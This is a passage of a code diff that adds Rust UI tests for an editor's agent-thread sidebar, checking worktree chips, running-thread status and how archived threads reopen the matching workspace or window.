setup_sidebar(&multi_workspace, cx); + + // Save a thread under the same paths as the workspace roots. + save_named_thread_metadata("wt-thread", "Cross Worktree Thread", &project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Should show two distinct worktree chips. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project_a, project_b]", + " Cross Worktree Thread {olivetti}, {selectric}", + ] + ); +} + +#[gpui::test] +async fn test_same_named_worktree_chips_are_deduplicated(cx: &mut TestAppContext) { + // When a thread's roots span multiple repos but share the same + // worktree name (e.g. both in "olivetti"), only one chip should + // appear. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project_a", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + fs.insert_tree( + "/project_b", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + for repo in &["project_a", "project_b"] { + let git_path = format!("/{repo}/.git"); + fs.add_linked_worktree_for_repo( + Path::new(&git_path), + false, + git::repository::Worktree { + path: std::path::PathBuf::from(format!("/worktrees/{repo}/olivetti/{repo}")), + ref_name: Some("refs/heads/olivetti".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + } + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project = project::Project::test( + fs.clone(), + [ + "/worktrees/project_a/olivetti/project_a".as_ref(), + "/worktrees/project_b/olivetti/project_b".as_ref(), + ], + cx, + ) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Thread with roots in both repos' "olivetti" worktrees. + save_named_thread_metadata("wt-thread", "Same Branch Thread", &project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Both worktree paths have the name "olivetti", so only one chip. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project_a, project_b]", + " Same Branch Thread {olivetti}", + ] + ); +} + +#[gpui::test] +async fn test_absorbed_worktree_running_thread_shows_live_status(cx: &mut TestAppContext) { + // When a worktree workspace is absorbed under the main repo, a + // running thread in the worktree's agent panel should still show + // live status (spinner + "(running)") in the sidebar. + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + + // Main repo with a linked worktree. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + // Worktree checkout pointing back to the main repo. + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + // Create the MultiWorkspace with both projects. + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(worktree_project.clone(), window, cx) + }); + + // Add an agent panel to the worktree workspace so we can run a + // thread inside it. + let worktree_panel = add_agent_panel(&worktree_workspace, cx); + + // Switch back to the main workspace before setting up the sidebar. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + + // Start a thread in the worktree workspace's panel and keep it + // generating (don't resolve it). + let connection = StubAgentConnection::new(); + open_thread_with_connection(&worktree_panel, connection.clone(), cx); + send_message(&worktree_panel, cx); + + let session_id = active_session_id(&worktree_panel, cx); + + // Save metadata so the sidebar knows about this thread. + save_test_thread_metadata(&session_id, &worktree_project, cx).await; + + // Keep the thread generating by sending a chunk without ending + // the turn. + cx.update(|_, cx| { + connection.send_update( + session_id.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())), + cx, + ); + }); + cx.run_until_parked(); + + // The worktree thread should be absorbed under the main project + // and show live running status. + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!( + entries, + vec![ + "v [project]", + " [~ Draft]", + " Hello {wt-feature-a} * (running)", + ] + ); +} + +#[gpui::test] +async fn test_absorbed_worktree_completion_triggers_notification(cx: &mut TestAppContext) { + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(worktree_project.clone(), window, cx) + }); + + let worktree_panel = add_agent_panel(&worktree_workspace, cx); + + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + + let connection = StubAgentConnection::new(); + open_thread_with_connection(&worktree_panel, connection.clone(), cx); + send_message(&worktree_panel, cx); + + let session_id = active_session_id(&worktree_panel, cx); + save_test_thread_metadata(&session_id, &worktree_project, cx).await; + + cx.update(|_, cx| { + connection.send_update( + session_id.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())), + cx, + ); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " [~ Draft]", + " Hello {wt-feature-a} * (running)", + ] + ); + + connection.end_turn(session_id, acp::StopReason::EndTurn); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " [~ Draft]", " Hello {wt-feature-a} * (!)",] + ); +} + +#[gpui::test] +async fn test_clicking_worktree_thread_opens_workspace_when_none_exists(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Only open the main repo — no workspace for the worktree. + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a thread for the worktree path (no workspace for it). + save_named_thread_metadata("thread-wt", "WT Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Thread should appear under the main repo with a worktree chip. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " WT Thread {wt-feature-a}"], + ); + + // Only 1 workspace should exist. + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1, + ); + + // Focus the sidebar and select the worktree thread. + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(1); // index 0 is header, 1 is the thread + }); + + // Confirm to open the worktree thread. + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + // A new workspace should have been created for the worktree path. + let new_workspace = multi_workspace.read_with(cx, |mw, _| { + assert_eq!( + mw.workspaces().count(), + 2, + "confirming a worktree thread without a workspace should open one", + ); + mw.workspaces().nth(1).unwrap().clone() + }); + + let new_path_list = + new_workspace.read_with(cx, |_, cx| workspace_path_list(&new_workspace, cx)); + assert_eq!( + new_path_list, + PathList::new(&[std::path::PathBuf::from("/wt-feature-a")]), + "the new workspace should have been opened for the worktree path", + ); +} + +#[gpui::test] +async fn test_clicking_worktree_thread_does_not_briefly_render_as_separate_project( + cx: &mut TestAppContext, +) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_named_thread_metadata("thread-wt", "WT Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " WT Thread {wt-feature-a}"], + ); + + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(1); // index 0 is header, 1 is the thread + }); + + let assert_sidebar_state = |sidebar: &mut Sidebar, _cx: &mut Context| { + let mut project_headers = sidebar.contents.entries.iter().filter_map(|entry| { + if let ListEntry::ProjectHeader { label, .. } = entry { + Some(label.as_ref()) + } else { + None + } + }); + + let Some(project_header) = project_headers.next() else { + panic!("expected exactly one sidebar project header named `project`, found none"); + }; + assert_eq!( + project_header, "project", + "expected the only sidebar project header to be `project`" + ); + if let Some(unexpected_header) = project_headers.next() { + panic!( + "expected exactly one sidebar project header named `project`, found extra header `{unexpected_header}`" + ); + } + + let mut saw_expected_thread = false; + for entry in &sidebar.contents.entries { + match entry { + ListEntry::ProjectHeader { label, .. } => { + assert_eq!( + label.as_ref(), + "project", + "expected the only sidebar project header to be `project`" + ); + } + ListEntry::Thread(thread) + if thread.metadata.title.as_ref() == "WT Thread" + && thread.worktrees.first().map(|wt| wt.name.as_ref()) + == Some("wt-feature-a") => + { + saw_expected_thread = true; + } + ListEntry::Thread(thread) => { + let title = thread.metadata.title.as_ref(); + let worktree_name = thread + .worktrees + .first() + .map(|wt| wt.name.as_ref()) + .unwrap_or(""); + panic!( + "unexpected sidebar thread while opening linked worktree thread: title=`{title}`, worktree=`{worktree_name}`" + ); + } + ListEntry::ViewMore { .. } => { + panic!("unexpected `View More` entry while opening linked worktree thread"); + } + ListEntry::DraftThread { .. } | ListEntry::NewThread { .. } => {} + } + } + + assert!( + saw_expected_thread, + "expected the sidebar to keep showing `WT Thread {{wt-feature-a}}` under `project`" + ); + }; + + sidebar + .update(cx, |_, cx| cx.observe_self(assert_sidebar_state)) + .detach(); + + let window = cx.windows()[0]; + cx.update_window(window, |_, window, cx| { + window.dispatch_action(Confirm.boxed_clone(), cx); + }) + .unwrap(); + + cx.run_until_parked(); + + sidebar.update(cx, assert_sidebar_state); +} + +#[gpui::test] +async fn test_clicking_absorbed_worktree_thread_activates_worktree_workspace( + cx: &mut TestAppContext, +) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(worktree_project.clone(), window, cx) + }); + + // Activate the main workspace before setting up the sidebar. + let main_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace.clone(), window, cx); + workspace + }); + + save_named_thread_metadata("thread-main", "Main Thread", &main_project, cx).await; + save_named_thread_metadata("thread-wt", "WT Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // The worktree workspace should be absorbed under the main repo. + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 3); + assert_eq!(entries[0], "v [project]"); + assert!(entries.contains(&" Main Thread".to_string())); + assert!(entries.contains(&" WT Thread {wt-feature-a}".to_string())); + + let wt_thread_index = entries + .iter() + .position(|e| e.contains("WT Thread")) + .expect("should find the worktree thread entry"); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + main_workspace, + "main workspace should be active initially" + ); + + // Focus the sidebar and select the absorbed worktree thread. + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(wt_thread_index); + }); + + // Confirm to activate the worktree thread. + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + // The worktree workspace should now be active, not the main one. + let active_workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + assert_eq!( + active_workspace, worktree_workspace, + "clicking an absorbed worktree thread should activate the worktree workspace" + ); +} + +#[gpui::test] +async fn test_activate_archived_thread_with_saved_paths_activates_matching_workspace( + cx: &mut TestAppContext, +) { + // Thread has saved metadata in ThreadStore. A matching workspace is + // already open. Expected: activates the matching workspace. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project-a", serde_json::json!({ "src": {} })) + .await; + fs.insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b.clone(), window, cx) + }); + let workspace_a = + multi_workspace.read_with(cx, |mw, _| mw.workspaces().next().unwrap().clone()); + + // Save a thread with path_list pointing to project-b. + let session_id = acp::SessionId::new(Arc::from("archived-1")); + save_test_thread_metadata(&session_id, &project_b, cx).await; + + // Ensure workspace A is active. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_a + ); + + // Call activate_archived_thread – should resolve saved paths and + // switch to the workspace for project-b. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: session_id.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Archived Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::new(&[PathBuf::from("/project-b")]), + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx.run_until_parked(); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_b, + "should have activated the workspace matching the saved path_list" + ); +} + +#[gpui::test] +async fn test_activate_archived_thread_cwd_fallback_with_matching_workspace( + cx: &mut TestAppContext, +) { + // Thread has no saved metadata but session_info has cwd. A matching + // workspace is open. Expected: uses cwd to find and activate it. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project-a", serde_json::json!({ "src": {} })) + .await; + fs.insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx) + }); + let workspace_a = + multi_workspace.read_with(cx, |mw, _| mw.workspaces().next().unwrap().clone()); + + // Start with workspace A active. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_a + ); + + // No thread saved to the store – cwd is the only path hint. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("unknown-session")), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "CWD Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::new(&[std::path::PathBuf::from("/project-b")]), + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx.run_until_parked(); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_b, + "should have activated the workspace matching the cwd" + ); +} + +#[gpui::test] +async fn test_activate_archived_thread_no_paths_no_cwd_uses_active_workspace( + cx: &mut TestAppContext, +) { + // Thread has no saved metadata and no cwd. Expected: falls back to + // the currently active workspace. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project-a", serde_json::json!({ "src": {} })) + .await; + fs.insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx) + }); + + // Activate workspace B (index 1) to make it the active one. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(1).unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_b + ); + + // No saved thread, no cwd – should fall back to the active workspace. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("no-context-session")), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Contextless Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx.run_until_parked(); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_b, + "should have stayed on the active workspace when no path info is available" + ); +} + +#[gpui::test] +async fn test_activate_archived_thread_saved_paths_opens_new_workspace(cx: &mut TestAppContext) { + // Thread has saved metadata pointing to a path with no open workspace. + // Expected: opens a new workspace for that path. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project-a", serde_json::json!({ "src": {} })) + .await; + fs.insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a thread with path_list pointing to project-b – which has no + // open workspace. + let path_list_b = PathList::new(&[std::path::PathBuf::from("/project-b")]); + let session_id = acp::SessionId::new(Arc::from("archived-new-ws")); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1, + "should start with one workspace" + ); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: session_id.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "New WS Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: path_list_b, + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx.run_until_parked(); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2, + "should have opened a second workspace for the archived thread's saved paths" + ); +} + +#[gpui::test] +async fn test_activate_archived_thread_reuses_workspace_in_another_window(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project-a", serde_json::json!({ "src": {} })) + .await; + fs.insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await; + + let multi_workspace_a = + cx.add_window(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + let multi_workspace_b = + cx.add_window(|window, cx| MultiWorkspace::test_new(project_b, window, cx)); + + let multi_workspace_a_entity = multi_workspace_a.root(cx).unwrap(); + let multi_workspace_b_entity = multi_workspace_b.root(cx).unwrap(); + + let cx_b = &mut gpui::VisualTestContext::from_window(multi_workspace_b.into(), cx); + let _sidebar_b = setup_sidebar(&multi_workspace_b_entity, cx_b); + + let cx_a = &mut gpui::VisualTestContext::from_window(multi_workspace_a.into(), cx); + let sidebar = setup_sidebar(&multi_workspace_a_entity, cx_a); + + let session_id = acp::SessionId::new(Arc::from("archived-cross-window")); + + sidebar.update_in(cx_a, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: session_id.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Cross Window Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::new(&[PathBuf::from("/project-b")]), + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx_a.run_until_parked(); + + assert_eq!( + multi_workspace_a + .read_with(cx_a, |mw, _| mw.workspaces().count()) + .unwrap(), + 1, + "should not add the other window's workspace into the current window" + ); + assert_eq!( + multi_workspace_b + .read_with(cx_a, |mw, _| mw.workspaces().count()) + .unwrap(), + 1, + "should reuse the existing workspace in the other window" + ); + assert!( + cx_a.read(|cx| cx.active_window().unwrap()) == *multi_workspace_b, + "should activate the window that already owns the matching workspace" + ); + sidebar.read_with(cx_a, |sidebar, _| { + assert!( + !matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { session_id: id, .. }) if id == &session_id), + "source window's sidebar should not eagerly claim focus for a thread opened in another window" + ); + }); +} + +#[gpui::test] +async fn test_activate_archived_thread_reuses_workspace_in_another_window_with_target_sidebar( + cx: &mut TestAppContext, +) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project-a", serde_json::json!({ "src": {} })) + .await; + fs.insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await; + + let multi_workspace_a = + cx.add_window(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + let multi_workspace_b = + cx.add_window(|window, cx| MultiWorkspace::test_new(project_b.clone(), window, cx)); + + let multi_workspace_a_entity = multi_workspace_a.root(cx).unwrap(); + let multi_workspace_b_entity = multi_workspace_b.root(cx).unwrap(); + + let cx_a = &mut gpui::VisualTestContext::from_window(multi_workspace_a.into(), cx); + let sidebar_a = setup_sidebar(&multi_workspace_a_entity, cx_a); + + let cx_b = &mut gpui::VisualTestContext::from_window(multi_workspace_b.into(), cx); + let sidebar_b = setup_sidebar(&multi_workspace_b_entity, cx_b); + let workspace_b = multi_workspace_b_entity.read_with(cx_b, |mw, _| mw.workspace().clone()); + let _panel_b = add_agent_panel(&workspace_b, cx_b); + + let session_id = acp::SessionId::new(Arc::from("archived-cross-window-with-sidebar")); + + sidebar_a.update_in(cx_a, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: session_id.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Cross Window Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::new(&[PathBuf::from("/project-b")]), + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx_a.run_until_parked(); + + assert_eq!( + multi_workspace_a + .read_with(cx_a, |mw, _| mw.workspaces().count()) + .unwrap(), + 1, + "should not add the other window's workspace into the current window" + ); + assert_eq!( + multi_workspace_b + .read_with(cx_a, |mw, _| mw.workspaces().count()) + .unwrap(), + 1, + "should reuse the existing workspace in the other window" + ); + assert!( + cx_a.read(|cx| cx.active_window().unwrap()) == *multi_workspace_b, + "should activate the window that already owns the matching workspace" + ); + sidebar_a.read_with(cx_a, |sidebar, _| { + assert!( + !matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { session_id: id, .. }) if id == &session_id), + "source window's sidebar should not eagerly claim focus for a thread opened in another window" + ); + }); + sidebar_b.read_with(cx_b, |sidebar, _| { + assert_active_thread( + sidebar, + &session_id, + "target window's sidebar should eagerly focus the activated archived thread", + ); + }); +} + +#[gpui::test] +async fn test_activate_archived_thread_prefers_current_window_for_matching_paths( + cx: &mut TestAppContext, +) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project-a", serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_b = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await; + + let multi_workspace_b = + cx.add_window(|window, cx| MultiWorkspace::test_new(project_b, window, cx)); + let multi_workspace_a = + cx.add_window(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + let multi_workspace_a_entity = multi_workspace_a.root(cx).unwrap(); + let multi_workspace_b_entity = multi_workspace_b.root(cx).unwrap(); + + let cx_b = &mut gpui::VisualTestContext::from_window(multi_workspace_b.into(), cx); + let _sidebar_b = setup_sidebar(&multi_workspace_b_entity, cx_b); + + let cx_a = &mut gpui::VisualTestContext::from_window(multi_workspace_a.into(), cx); + let sidebar_a = setup_sidebar(&multi_workspace_a_entity, cx_a); + + let session_id = acp::SessionId::new(Arc::from("archived-current-window")); + + sidebar_a.update_in(cx_a, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: session_id.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Current Window Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::new(&[PathBuf::from("/project-a")]), + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx_a.run_until_parked(); + + assert!( + cx_a.read(|cx| cx.active_window().unwrap()) == *multi_workspace_a, + "should keep activation in the current window when it already has a matching workspace" + ); + sidebar_a.read_with(cx_a, |sidebar, _| { + assert_active_thread( + sidebar, + &session_id, + "current window's sidebar should eagerly focus the activated archived thread", + ); + }); + assert_eq!( + multi_workspace_a + .read_with(cx_a, |mw, _| mw.workspaces().count()) + .unwrap(), + 1, + "current window should continue reusing its existing workspace" + ); + assert_eq!( + multi_workspace_b + .read_with(cx_a, |mw, _| mw.workspaces().count()) + .unwrap(), + 1, + "other windows should not be activated just because they also match the saved paths" + ); +} + +#[gpui::test] +async fn 